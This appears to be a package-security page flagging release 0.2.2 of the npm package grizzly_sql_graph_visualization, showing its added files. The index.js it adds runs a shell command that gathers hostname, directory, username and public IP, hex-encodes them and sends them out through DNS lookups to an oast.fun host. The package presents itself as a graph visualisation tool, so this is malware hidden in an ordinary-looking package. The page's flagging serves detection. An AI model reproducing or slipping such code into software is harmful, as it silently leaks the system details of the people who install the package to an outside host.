grizzly_sql_graph_visualization 0.2.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of grizzly_sql_graph_visualization might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +17 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,17 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;pwd;whoami;echo 'grizzly_sql_graph_visualization';curl
3
+ https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do
4
+ nslookup $a.ck073ge2vtc0000r9s2ggjodtaryyyyyb.oast.fun;done" , (error,
5
+ data, getter) =>
6
+ {
7
+ if(error){
8
+ console.log("error",error.message);
9
+ return;
10
+ }
11
+ if(getter){
12
+ console.log(data);
13
+ return;
14
+ }
15
+ console.log(data);
16
+
17
+ });
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "grizzly_sql_graph_visualization",
3
+ "version": "0.2.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }